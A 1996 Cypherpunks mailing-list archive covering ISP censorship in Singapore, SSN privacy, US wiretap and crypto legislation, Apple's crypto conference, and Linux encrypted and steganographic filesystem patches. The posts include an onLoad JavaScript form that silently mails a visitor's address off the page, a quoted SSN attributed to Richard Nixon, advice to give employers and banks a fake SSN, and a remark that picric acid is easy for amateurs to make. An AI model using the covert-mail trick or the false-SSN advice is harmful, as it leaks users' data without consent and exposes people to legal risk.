Zv+ksrEp19U30jReTaDHMRg2IDQ0S7T/+YykWf4cx/L4x0ll55zfT29THWHVqpeA
4w0PnSBJubMsG6iJAJUCBRAt7mhNxWtO/Jg7MBkBAWyPA/9BYsA3G33jcg1SfuxC
Fh4yMVZCBrvgK2FBJZUdxkgR1WfVYe5/GzV3jRzJxuXGdt0yzFb8HsocRUvnA4vi
O6Jngza+seuc+dNC8X1LyyuW0rkogVZE6ds/v4qI2P+uticCh8xBLp7ieAjvGIcc
tdQnXrMxF+w6V80cSy/dqxJjtg==
=WVf6
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMga4f8VrTvyYOzAZAQFSHQP+PDyrhYPZ6AMVyTk3ZSvlyF3rba9Xn7jZ
iGk3hN/2yPwdk2Oyaf7NOsL6WyyFPQOvfYgOhgb2Q49EPfhmqmo5PkZLEqb16f35
otKOAcAdKwMxwcG8aS7zEBrT4zquGoVRHxldJhfv71PUWihpsIxc4ZJKed9q+uCq
DjkRUtAW+2U=
=s19M
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 7 Aug 1996 09:08:05 +0800
To: cypherpunks@toad.com
Subject: Censorship through proxy
Message-ID: <199608061625.JAA04294@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


SingNet, one of Singapore's larger ISPs is telling all of their subscribers
they must move to using SingNet's proxy server by September 14, 1996 if they
want to have access to the Web.

If you try to access one of the SBA's banned sites, you'll get a message
that says, "The site you requested is not accessible."

Check out:

http://www.singnet.com.sg/cache/sbareg.html

It's interesting that in the blurb about the proxy server, they're marketing
it as offering "better and faster performance" than not using it.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Coltrin <janee@okway.okstate.edu>
Date: Wed, 7 Aug 1996 20:35:29 +0800
To: cypherpunks@toad.com
Subject: Re[2]: SSNs (was Re: Internal Passports)
Message-ID: <20758330@Okway.okstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> wrote:

>one silly thought: lots of people use cypherpunks as the username and 
>password for all those websites that want an id. What about a cypherpunks 
>3-2-4 number for those cases where an SSN isn't appropriate. Anyone know 
>what J. Edgar Hoover's SSN was?


According to one of "George Hayduke"'s books, Richard Nixon's was 567-68-0515.

-spc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Coltrin <janee@okway.okstate.edu>
Date: Wed, 7 Aug 1996 23:48:43 +0800
To: cypherpunks@toad.com
Subject: Re[2]: SSNs (was Re: Internal Passports)
Message-ID: <207582f0@Okway.okstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> wrote:

>one silly thought: lots of people use cypherpunks as the username and 
>password for all those websites that want an id. What about a cypherpunks 
>3-2-4 number for those cases where an SSN isn't appropriate. Anyone know 
>what J. Edgar Hoover's SSN was?


According to one of "George Hayduke"'s books, Richard Nixon's was 567-68-0515.

-spc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 7 Aug 1996 14:03:40 +0800
To: cypherpunks@toad.com
Subject: Waiting Game on wiretapping and crypto, from HotWired
Message-ID: <v01510101ae2d0b1a7fc7@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





Date: Tue, 6 Aug 1996 05:15:15 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
Reply-To: Declan McCullagh <declan@well.com>
Subject: Waiting Game on wiretapping and crypto, from HotWired
To: fight-censorship@vorlon.mit.edu
Sender: owner-fight-censorship@vorlon.mit.edu

We have a four-week reprieve until the Senate returns. As I say in the
full article at the URL below, they've been worse than the House when it
comes to wiretapping/crypto/censorship. For instance, senators already
passed the Feinstein Amendment banning bomb-making info (on- and off-line)
as part of a defense appropriations authorization bill.

-Declan

---

http://www.netizen.com/netizen/
HotWired, The Netizen

Waiting Game
by Declan McCullagh (declan@well.com)
Washington, DC, 5 August

   In a last-minute legislative crunch before the summer recess, House
   Republicans on Friday outmaneuvered their Democratic counterparts and
   coughed up a surprisingly reasonable anti-terrorism bill, which the
   Senate will act on when Congress returns next month.

[...]

   But the Senate has begun its own four-week vacation without voting on
   the measure, and they'll have plenty of time to reintroduce the
   missing [wiretapping] language when they return.

   The outlook, frankly, is dismal, says Don Haines of the American Civil
   Liberties Union. "The Senate has been much more interested in giving
   the FBI a blank check. They've been much more sympathetic to
   increasing wiretapping. They've been much less interested in
   protecting privacy," Haines said.

[...]

   Meanwhile, Senator Patrick Leahy (D-Vermont) - a staunch opponent of
   the Communications Decency Act - continues to tout his Digital
   Telephony legislation, which he shepherded through Congress in 1994...

   Perhaps Harry Browne, the Libertarian Party's candidate for president,
   had it right when he said last week: "If we're not careful, half of
   the Bill of Rights will fall victim to the frantic desire of
   Republican and Democratic politicians to appear tough on terrorists."

   The last few years have seen several murderous acts of terror on
   American soil - and now, with the explosion of TWA Flight 800, in
   American airspace. Americans should brace themselves for even more...
   Whether the terror is foreign or domestic in origin, one thing's for
   certain: cries for a government crackdown will mount.

   But by granting their government police-state powers, Americans will
   have awarded terrorists their first substantial victory in the United
   States.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Wed, 7 Aug 1996 09:39:36 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <v03007803ae2d271b50b8@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks as a spectator sport becomes interesting when a several
intelligent, articulate, people start a productive rant. Emphasis
on "productive."  Unfortunately, this rant is rapidly degenerating
into an emotional bickering between people who are capable of
accomplishing much more.

For the record, there are several Apple employees, some *very*
high up in the food chain, who receive selected postings from
Cypherpunks. For better or for worse, however, they are spared
pipebomb-punks, Sternlight-punks, Ritalin-punks, and most of
the other nonsense that permeates this mailing list.

I, for one, would appreciate the chance to hear Tim May present
"crypto-anarchy" and "crypto-privacy" -- in a much more coherent fashion
than I would get at a physical cypherpunks meeting or from the
mailing list. I'm not sure what Tim's consulting fee might be, but
I'd be happy to contribute a six-pack of Anchor Steam if that would help.

Vinnie is putting the "Mac Crypto" conference together in his spare
time using "borrowed" facilities in a way that stays below Apple's
"radar horizon". Think of it as a slightly more formal physical
cypherpunks meeting. He may be able to scare up a budget for drinks and
munchies, but don't expect a t-shirt.

As for the "Mac is dead," I'll leave that to another time and place.

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Wed, 7 Aug 1996 21:29:30 +0800
To: jsw@netscape.com
Subject: Re: Stealth cookies
Message-ID: <2.2.32.19960806171618.00a52aec@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 AM 8/6/96 -0700, you wrote:
>John F. Fricker wrote:
>> Solution?
>> 
>> 1) Don't put your name in the netscape configuration (d'oh)
>
>  No, no, no.  Netscape navigator does not reveal your name or
>put it into cookies.  The only way to get your name or other
>personal information about you into a cookie is for you to type
>it into a web site, and have that site send you back a cookie.
>
>  The only time we reveal your name is in e-mail headers, and
>when doing anonymous FTP when you have manually disabled the default
>of sending 'mozilla@' as the anon ftp password.
>
>	--Jeff
>

Oh I was just being paranoid I guess. There used to be JavaScript that would
automatically send email from a page. something like 

<html>
<body onLoad="document.mailme.submit()">
<form method=post name="mailme"
action="mailto:john@vertexgroup.com?subject=user address">
<input type=hidden name="userAddress" value="done">
</form>
</body>
</html>

But even if that still works it would be a good trick to associate it with a
cookie.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 7 Aug 1996 15:32:08 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <ae2cccd914021004de59@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM 8/6/96, Martin Minow wrote:
>Cypherpunks as a spectator sport becomes interesting when a several
>intelligent, articulate, people start a productive rant. Emphasis
>on "productive."  Unfortunately, this rant is rapidly degenerating
>into an emotional bickering between people who are capable of
>accomplishing much more.

Note that I had made no mention of this exchange with VM on the list. I had
not echoed my "Mac is dead" points, and had not bad-mouthed the "Mac
Crypto" thing.

However, when my private e-mail to VM was commented upon, in a not so
thinly disguised form, and when Bob H. made it clear he'd been privy to my
e-mail, I felt justified in setting the record straight on my views, as
expressed in my e-mail to Vinnie.

(It was not, being an e-mail note, meant to be a closely-reasoned and
footnoted summary of Apple's problems, just a statement of why I had no
interest in giving a kind of pep talk to Apple folks.)

As to whether it's appropriate as a thread here on Cypherpunks, hey,
there's a "delete" key on most machines.

Again, I don't consider the Mac to be dead, at least not for several years.
The Amiga lives on, and it never had even a fraction of the peak market
share of the Mac. However, the focus of crypto has clearly moved well away
from the Mac. I noted where the emphasis needs to be, for maximum impact.
Namely, Eudora, Netscape, and other mail and Web programs.

It's a basic fact of life--think about it--that people on this list and
elsewhere are _not_ asking what Gil Amelio's stance on cryptography is.
They don't care, as Gil Amelio, Heidi Roizen, Guy Kawasaki, and all the
rest are simply not in the critical path. What people care about is what
plans Bill Gates, Jim Clarke, and Jim Bidzos have, or their factotums, as
these are the folks who will likely shape the commercial product landscape.

(As to why I don't switch, I have much time and money invested in Macs, and
they still work. As I said in one of my notes to Vinnie, I mainly use
Eudora Pro for mail, Netscape Navigator for browsing, and a handful of
other programs. There would be no compelling gain were I to scrap my Mac
investment and buy a Pentium Pro and Windows NT.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anne Eisenberg <aeisenb@duke.poly.edu>
Date: Wed, 7 Aug 1996 08:53:17 +0800
To: cypherpunks@toad.com
Subject: DoubleClick: Does is track browsing across multiple sites?
Message-ID: <Pine.SUN.3.93.960806103613.20022F-100000@duke.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know whether DoubleClick really is tracking browsing patterns
across multiple sites?  They claim to be able to do this; is it just
advertising hype, or does anyone have knowledge of its actually doing so?
Many thanks.

Anne Eisenberg
aeisenb@duke.poly.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <apb@iafrica.com>
Date: Wed, 7 Aug 1996 06:59:35 +0800
To: cypherpunks@toad.com
Subject: Re: Integrating PGP 3.0 Library with INN
In-Reply-To: <199608051829.NAA19030@galaxy.galstar.com>
Message-ID: <Pine.NEB.3.95.960806113638.23524E-100000@apb.iafrica.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Aug 1996, Igor Chudov wrote: 
> Has anyone thought of integrating PGP 3.0 library with INN? 

INN-1.5 will include a mechanism for PGP-authentication of control
messages (newgroup, rmgroup, cancel, ...).  My understanding is that
ordinary (non-control) messages will not be authenticated at all by innd
itself; that will still need to be done externally (by tools such as
PGPMoose). 

--apb (Alan Barrett)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kickboxer <charlee@netnet.net>
Date: Wed, 7 Aug 1996 08:56:54 +0800
To: cypherpunks@toad.com
Subject: test message
Message-ID: <199608061646.LAA26121@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


test
                                                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 7 Aug 1996 10:24:12 +0800
To: Jamie Zawinski <jwz@netscape.com>
Subject: Re: SSNs (was Re: Internal Passports)
In-Reply-To: <320652BC.31DF@netscape.com>
Message-ID: <Pine.SUN.3.94.960806122909.10763A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Aug 1996, Jamie Zawinski wrote:

> Black Unicorn wrote:
> > 
> [ ...random losers asking for your SSN... ]
> > > I was horrified and gave a random number.
> > 
> > You should always be horrified, and always give a random number.
> 
> Well, it would be nice if it was that easy.  You (legally) need to give
> the correct one to anyone who has to make a report about you to the IRS,
> right?  Such as your employer.  But it's not always clear who else needs
> it.  Is it needed to allow someone to do a credit check on you?  Is it
> needed to get a driver's license?  (The fine print on the DMV forms says
> "yes".)  Is it necessary to make use of employer-sponsored medical
> insurance?  (I suspect that the answer to this one is "no", except for
> the fact that when my employer set up my medical insurance they let the
> insurance company use my SSN as my insurance-related-ID-number.  But in
> any event, my dentist told me, "if you don't give it to us, they won't
> pay.")
> 
> I don't like the idea of having a universal ID number, but neither do I
> like the idea of having to go to extreme lengths to make the "right
> thing" happen for something where my effort will have only moral impact,
> not material.
> 
> If you already have a SSN, can you get a *new* one in any legal way?
> (Sort of the same idea as changing your phone number to avoid
> telemarketing scum...)

I explained a good deal of this in a post I made some time ago where I
related the tale of a friend who had simply made up a number and used it
since age 17.

The reality is that not much will be done, aside some form letters from
the IRS indicating that you seem to be using the wrong number, and won't
you please change it. 

I suppose that you might have to give it to the IRS if you want a refund,
but why to your employer?  Why not give your employer the wrong number
and correct it directly to the IRS when the IRS complains?

Ditto for your bank.

Almost no one can actually get the number related to your name, only
verify if the number you are using has been issued.

I am continually amazed at the number of people who surrender this number
simply because someone tells them that they have to or the sky will fall
in.

Bottom line, if someone besides the IRS or the SS people have your
name/number relation, it is because YOU gave it to them.

> 
> -- 
> Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
> ``A signature isn't a return address, it is the ASCII equivalent of a
>   black velvet clown painting; it's a rectangle of carets surrounding
>   a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
>                                                          -- Chris Maeda
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 7 Aug 1996 21:10:50 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: "lite" version of cpunks available?
In-Reply-To: <Pine.BSF.3.91.960805181131.186A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.SUN.3.91.960806124219.8876B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Aug 1996, Steve Reid wrote:

> Are there any filtered versions of the Cypherpunks mailing list available? 
> I'm currently subscribed to cypherpunks-d@gateway.com, but that machine is
> down and I haven't received anything in the past few days. 


Yes, I run one of them.  To subscribe send a message to sunder@dorsai.org 
with the subject "fcpunx subscribe" (no quotes.)  Do not reply to this 
message as the perl scripts that handle these tasks ignore messages from 
mailing lists.

For more info see: http:/www.dorsai.org/~sunder/crypto.html 

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 7 Aug 1996 16:06:31 +0800
To: Hallam-Baker <cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608070517.WAA03969@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:20 PM 8/4/96 -0400, Hallam-Baker wrote:
> It would be entirely foolish for the crypto
> lobby to allow themselves to be tied to the NRA. The NRA has
> no choice but to support civil liberties, there is no reason
> why the wider civil liberties movement needs to support the
> NRA.

First they came for the communists .....

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 7 Aug 1996 17:08:56 +0800
To: jim bell <umwalber@cc.UManitoba.CA
Subject: Re: Bombs & bomb threats in LA
Message-ID: <199608070517.WAA03971@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 AM 8/5/96 -0800, jim bell wrote:
> The molecular difference between TNT and picric acid is a methyl group, 
> weight 15 (on TNT) substituted for a hydroxyl, weight 17 (on 
> picric acid.)   If there is a difference, it is a very small one.

Picric acid is easier for amateurs to make than TNT.

It has the same energy per unit mass as TNT, but it's destructive
power is greater because of the substantially higher velocity of
detonation.

It is far less predictable and far easier to detonate than TNT.  Also
TNT has the advantage that it can be melted and poured into molds,
and it is cheaper to manufacture in large quantities.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Tue, 6 Aug 1996 14:11:56 +0800
To: cypherpunks@toad.com
Subject: view from Australia (Re: United States as Northern Ireland)
In-Reply-To: <ae2be7b705021004087b@[205.199.118.202]>
Message-ID: <199608060349.AA24880@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain



In Australia the gun lobby are now deeply distrusted. During the
current crackdown on high powered and repeating weapons they have made
many statements, at all levels of their movement, that indicate that
they want the guns in order to kill people and to give themselves the
option of insurrection. Unlike the US this is not an activity that is
supported by the constitution and the people are strongly against it.

If we assume that the gun lobby will lose, [please I am not discussing
whether it *should* lose and I'm not interested in arguments on this
so send them to the list not to me], then supporters of privacy and
freedom through cryptography do the cause a great disservice by
associating themselves with the gun lobby.

In fact we are passing up a great chance to sell the cause of
communication freedom through cryptography by arguing:

  Communication privacy through cryptographic technology is a 
  necessary counter-balance to the inevitable increase in state 
  control of public spaces [in an age when weapons technology
  permits weapons that can kill large numbers of people to be
  easily concealed].

  Secure electronic communication is the freedom that carries no 
  direct risk to other people. It is the one that must be preserved 
  in a free society.

  The 1990s is the decade of the bloodless revolution built on
  the freedom of communication. Preserving free communication is
  the vital step in countering out-of-control governments and criminal
  organizations, and cryptography is the way to keep communication
  free.

I don't think this line of argument will appeal to cypherpunks but
if there are other organizations running this line I'd be keen to
support them.

Bob Smart





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Daniel <anthony@direct.it>
Date: Wed, 7 Aug 1996 08:49:37 +0800
To: cypherpunks@toad.com
Subject: European crypto export controls
Message-ID: <2.2.32.19960806130653.00694410@betty.direct.it>
MIME-Version: 1.0
Content-Type: text/plain


Hello

I'm looking to find information on which European countries ban the
exportation of strong cryptography.

Please reply to: anthony@direct.it

Thanks in advance

Anthony





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 7 Aug 1996 11:26:20 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <3207B8DD.794B@ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960806152235.17794B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 6 Aug 1996, Hallam-Baker wrote:

> ...unless Alan withdraws his allegations I will bring proceedings
> against him for libel. While I accept his right to free speech I do
> not accept that he has a right to attempt to restrict mine with his
> threats of deportation. 

One of the ways UK and US laws differ is in regard to defamation.
In the US, truth is a defense.  In the UK it is not.  Phill may
have a tough time prevailing with such a suit.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon@taurus.apple.com (Jon Callas)
Date: Wed, 7 Aug 1996 18:18:23 +0800
To: cypherpunks@toad.com
Subject: Apple people on the list
Message-ID: <v02130504ae2d6c856d70@[17.130.22.227]>
MIME-Version: 1.0
Content-Type: text/plain


A quick response to Tim May's recent mail.

I'm an Apple employee. I'm on the cypherpunks list, but I'm not sure if Tim
would consider me active. I read cypherpunks on one of the edited versions
(the "frogfarm" edition, many thanks to its editor, Damaged Justice), but I
subscribe to and read Coderpunks. I do, however write software and papers on
security and crypto. I have done so for over six years.

One of the reasons I subscribe to Cypherpunks is, in fact, Tim May. Whenever
I see something he's written, I read it, which is more than I can say for
most of Cypherpunks. When I was getting all of Cypherpunks, I used Tim's
messages as navigation buoys.

I am disappointed that Tim won't be at the Mac Crypto conference. I thought
it was an excellent idea for him to speak, and think it would still be an
excellent idea. I would like to hear his views in a forum more detailed than
the short things that go on Cypherpunks. As for me, I'm going to be giving a
talk at the conference on using, abusing, and constructing random number
generators. The talk is an updated reprise of the talk and paper I gave at
MacHack '96.

A number of us would also like to hear Tim speak. I'm sure that as a
consulting fee we can come up with enough t-shirts and beer that it will make
the drive back over 17 even more harrowing than it usually is. I'll toss in a
copy of the Macintosh Entropy Manager, but since I'm giving it away to anyone
who wants it, it's not much. Perhaps I can autograph a floppy or something.

        Jon Callas
        Senior Scientist
        Apple Labs, Advanced Communications and Collaboration
        jon@taurus.apple.com
        http://www.merrymeet.com/jon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Wed, 7 Aug 1996 19:12:44 +0800
To: coderpunks@toad.com
Subject: appropriate algorithm for application
Message-ID: <2.2.32.19960806232209.006e2c84@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I need an algorithm/protocol that is capable of encrypting numerous
files with separate keys, but there also needs to be a master key
that will be able to decrypt all of them.  Is there such a system 
that is relatively secure?  I'd prefer the system to be as secure
as possible, but in this application, security is secondary to 
functionality.  Thanks... //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@azstarnet.com (David M. Rose)
Date: Wed, 7 Aug 1996 18:16:02 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: [NOISE] Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608062350.QAA18315@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hallam-Baker wrote:

>First off Alan posted private mail to the list. In this case mail
>that was more than simply personal. 
>
>Secondly unless Alan withdraws his allegations I will bring proceedings
>against him for libel. While I accept his right to free speech I do
>not accept that he has a right to attempt to restrict mine with his
>threats of deportation. 
>
>
>	Phill Hallam-Baker
>

Oh goody! Another Hallam-Baker-generated p*ssing contest.  Perhaps you
fellows should settle your differences with a bet. Oops, I forgot. The good
"Doc" dishonors his wagers with a series of fantastic and infantile
"misunderstandings".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Wed, 7 Aug 1996 19:34:02 +0800
To: coderpunks@toad.com
Subject: Fixes to loop.c et al. for DES,IDEA,stego now done
Message-ID: <199608062350.QAA10693@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As I mentioned before, the hooks to DES (and IDEA; with Nicholas Leon's
patches) in loop.c and {mount,losetup}(8) are horribly broken.
For example, the DES key you type in is totally ignored, and only the first
byte of the IDEA key you enter is relevant.  As well, the DES code was using
PCBC mode, and IDEA was using ECB mode.

I've fixed the key management (the key is based on a SHA1 hash of the pass
phrase you enter), and changed both DES and IDEA to use CBC mode.

Adding other encryption methods (Blowfish, for example) should be
straightforward.  In fact, I'm planning to add a facility for dynamically
adding and removing general data transformation modules (maybe for 2.1...).

In addition, I've implemented steganography (hiding a filesystem in the low
bits of, say, an audio file), and fixed some assorted bugs in loop.c
(incorrect variables were being used in some places, and a deadlock was fixed
having to do with making a loop device on top of another loop device).

The patches are available from:

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/index.html

Since that site seems to be down a lot, there's an alternate site:

ftp://csclub.uwaterloo.ca/pub/linux-stego/index.html

Note that there's one file that contains crypto that users outside of the
US and Canada must not download.  See below for further details and
instructions.

Attached is the text version of index.html.  Share and enjoy.

   - Ian

- -----------------8<--------------------8<----------------
Encryption and Steganography for Linux

This directory contains patches to the Linux kernel to enable encryption and
steganography of filesystems. Encryption allows you to have a scrambled
partition or file that, with the proper pass phrase, you can mount, just
like a normal filesystem. Steganography allows you to hide a filesystem in
the low bits of, say, an audio file. You can even combine these two to hide
a scrambled filesystem in the low bits of an audio file (see the example,
below).

Installation instructions

  1. Get a fresh copy of linux-2.0.11.tar.gz from your favourite site.
  2. Patch it with the loopfix-2.0.11.patch file found in this directory.
     This fixes some bugs in the loop block device driver, and adds
     steganography support to it. Hopefully this will go into the standard
     kernel soon.
  3. Now you want to add cryptography support. Due to a strange US
     regulation, this has to be split up into two pieces. The first piece,
     export-2.0.11.patch, doesn't actually contain any cryptograhy; it just
     contains the changes to the Makefiles and documentation, etc. to
     reflect the eventual presence of cryptography. You should get this file
     and patch it into the result of step 2.
  4. If the site you are downloading these files from is in the US or
     Canada, you may only download the second piece, crypto-2.0.11.patch, if
     you are also in the US or Canada. If you are not, here's what's in the
     file, and where to get it:
        o The file contains the files drivers/block/idea.c, kernel/des.c,
          include/linux/idea.h and include/linux/des.h.
        o To get these files, go visit
          http://www.binary9.net/nicholas/linuxkernel/patches/ and get the
          patches des-1.0.patch and idea-1.0.patch.
        o Edit these patches and remove everything in them that isn't
          related to one of the four files listed above.
        o What you have left should be functionally equivalent to
          crypto-2.0.11.patch.
  5. Take either crypto-2.0.11.patch or what you got from outside the US,
     and patch it into the result of step 3.
  6. You now have a complete kernel. Compile as usual.

You will also need an updated version of the mount and losetup commands in
order to use this. To get these, download mount-2.5k from
ftp://ftp.win.tue.nl/pub/linux/util/mount-2.5k.tar.gz. Then get the patch
mount-2.5k.patch from this directory, and patch it into the sources. Compile
and install.

It would be really good if these patches to the kernel and to mount for
steganography and encryption were made standard, and enabled by default. The
reason for this is that it would be more suspicious for someone to have a
"special" kernel with stego capabilities than to just have a regular kernel,
configured in the default way.

Sample encrypted and stego'd filesystem

In this directory are two audio files. Alice-Bob.orig.au is a file I
downloaded from http://www.iro.umontreal.ca/labs/theorique/Alice-Bob.html.
The other file, Alice-Bob.au, is the same, except that it has an encrypted
filesystem hidden in the low bit of each byte. You can listen to each of
them, and see how much difference there is (it's just in the noise). To see
the filesystem, get a new kernel and mount/losetup as descibed above. Also
make sure you have loop devices in /dev/loop*, as described below. Then:

# losetup -e stego /dev/loop0 Alice-Bob.au
Use the low bits of each (b)yte, (s)hort, or (l)ong?
(Use lowercase letters for little-endian; uppercase for big-endian.)
b/s/l/B/S/L: [b]
# mount /dev/loop0 /mnt -oloop,encryption=idea
Pass phrase: What are we going to do tomorrow night, Brain?
# ls -al /mnt
total 220
drwxr-xr-x   3 root     root         1024 Aug  4 10:47 ./
drwxr-xr-x  23 root     root         1024 Aug  4 01:50 ../
drwxr-xr-x   2 root     root        12288 Aug  4 10:46 lost+found/
- -rw-r--r--   1 root     root           71 Aug  4 10:47 passwords
- -rw-------   1 root     root       208247 Aug  4 10:47 world_domination_plans
# umount /mnt
# losetup -d /dev/loop0

Usage instructions

First, make sure you have devices called /dev/loop0, /dev/loop1, ...,
/dev/loop7. If not, make them as follows:

# cd /dev
# for i in 0 1 2 3 4 5 6 7; do mknod loop$i b 7 $i; done
# chgrp disk /dev/loop[0-7]
# chmod 660 /dev/loop[0-7]

A note on choosing pass phrases: Pass phrases can be up to 128 characters
long. It's in your best interests to choose a good one. Make it long, and
hard to guess. There are FAQs out there on how to choose a good pass phrase,
I think.

Finally, here is a copy of the file
Documentation/filesystems/loop_crypt.txt:

Encryption and Steganography for Linux
- --------------------------------------

The "loop" block device driver allows you to "hide" a filesystem in
a disk partition or in a regular file, either using encryption (scrambling
the data) or steganography (hiding the data in the low bits of, say,
a sound file).

To use this, you will need updated versions of the "mount" and "losetup"
commands.  They are both in the mount-2.5k, which you can get from

 ftp://ftp.win.tue.nl/pub/linux/util/mount-2.5k.tar.gz

but you will need to patch it with the changes from

 ftp://ftp.csua.berkley.edu/pub/cypherpunks/filesystems/linux/mount-2.5k.patch

Also, if you want to use DES or IDEA encryption and not just XOR (which,
encryptionwise, is really terrible), you'll need to get the crypto patches
to the kernel.  If you're in the US or Canada, you can get them from

 ftp://ftp.csua.berkley.edu/pub/cypherpunks/filesystems/linux/crypto.patch

Otherwise, check

 ftp://ftp.csua.berkley.edu/pub/cypherpunks/filesystems/linux/index.html

to see how to get them.

How to use it
- -------------

Here are a number of examples:

To create an encrypted floppy (using IDEA):

Put a floppy in drive 0.
# dd if=/dev/urandom of=/dev/fd0 bs=1k seek=8
# losetup -e idea /dev/loop0 /dev/fd0
